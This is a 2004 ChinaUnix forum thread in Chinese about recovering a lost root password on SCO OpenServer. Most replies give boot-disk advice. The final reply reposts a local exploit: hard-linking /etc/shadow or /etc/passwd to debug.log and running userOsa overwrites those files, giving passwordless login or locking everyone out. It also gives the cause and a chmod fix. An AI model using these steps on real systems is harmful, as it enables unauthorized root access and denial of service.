免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 1741 | 回复: 9
打印 上一主题 下一主题

[SCO UNIX] 没有应急盘,root丢失,是不是就没办法了,有重要数据啊 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2004-03-24 17:23 |只看该作者 |倒序浏览
请帮忙

论坛徽章:
0
2 [报告]
发表于 2004-03-24 17:31 |只看该作者

没有应急盘,root丢失,是不是就没办法了,有重要数据啊

办法很多,seach一下

论坛徽章:
0
3 [报告]
发表于 2004-03-24 20:52 |只看该作者

没有应急盘,root丢失,是不是就没办法了,有重要数据啊

如果是普通PC机,一般找一个机器作了通用应急盘就可以用,要是服务器,最好找个同型号的机器,作一个通用应急盘也可以用。

论坛徽章:
0
4 [报告]
发表于 2004-03-25 11:28 |只看该作者

没有应急盘,root丢失,是不是就没办法了,有重要数据啊

做完引导盘,是不是应在boot:后输 fd(60)unix.Z  root=hd(42) wsap=hd(41)  可是见不到#,提示root找不到

论坛徽章:
0
5 [报告]
发表于 2004-03-25 11:31 |只看该作者

没有应急盘,root丢失,是不是就没办法了,有重要数据啊

如果boot:回车,用别的机器做的root盘,提示ramdisk装载失败,可盘里的ramdisk.Z没问题

论坛徽章:
1
15-16赛季CBA联赛之北控
日期:2022-03-04 22:35:50
6 [报告]
发表于 2004-03-25 11:45 |只看该作者

没有应急盘,root丢失,是不是就没办法了,有重要数据啊

在Boot后输入hd(40)unix

论坛徽章:
0
7 [报告]
发表于 2004-03-25 15:05 |只看该作者

没有应急盘,root丢失,是不是就没办法了,有重要数据啊

找块硬盘克隆一份。
对克隆的硬盘处理。

论坛徽章:
0
8 [报告]
发表于 2004-03-25 18:10 |只看该作者

没有应急盘,root丢失,是不是就没办法了,有重要数据啊

如果是没有打补丁的SCO 505,利用它的漏洞可以用普通用户去掉ROOT口令。

论坛徽章:
0
9 [报告]
发表于 2004-03-25 18:25 |只看该作者

没有应急盘,root丢失,是不是就没办法了,有重要数据啊

什么漏洞?

怎么做??

论坛徽章:
0
10 [报告]
发表于 2004-03-25 18:31 |只看该作者

没有应急盘,root丢失,是不是就没办法了,有重要数据啊

前提是要有一个能登陆的普通用户。

以下是转贴

SCO OpenServer 5 的大漏洞 (摘自www.wxygzs.com)


SCO UNIX 的大BUG!任何用户都可以破坏系统是不是有点狗仔队的口气。  


1.进入一个你可以写的目录。
2. ln /etc/shadow debug.log
3. /etc/sysadm.d/bin/userOsa >;>;bab
............................
则你的/etc/shadow文件已经被覆盖。任何人可以以任何帐户登录无须密码.
若第二步改为ln /etc/passwd debug.log 则谁也登不上来了!
>;>;bab 是任意敲入的
..........................是程序的显示
注意整个过程中不要离开当前可写目录!
已在unix 5.0.5 &5.0.4上验证。

原理:

SCO /etc/sysadm.d/bin/userOsa 这个程序在运行时会生成一个名叫
debug.log的文件这个文件用户属于root 组属于auth
与shadow文件的一致,而且此程序有BUG不会检查用户权限,因此可以覆盖任何文件,包括passwd和shadow.你在一个可写目录中建立连接(ln命令)将某个文件指向debug.log文件运行userOsa时它将出错信息写入log文件时实际上就覆盖了那个你想破坏的文件!

对于一些机器可以,但是有些SCO机器不知为何

如果SHADOW或PASSWORD文件不能联结,对于一些机器可以,但是有些SCO机器不知为何,不允许我LN这两个文件,报错,不知为何?
答:理论上只要对目录/etc 有读权限,就可以链接。在此例中估计必须用硬链接,若用符号链接ln -s 会因为权限问题未遂。
答复者:Mike Wolf

防范对策

chmod o-x userOsa即可
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP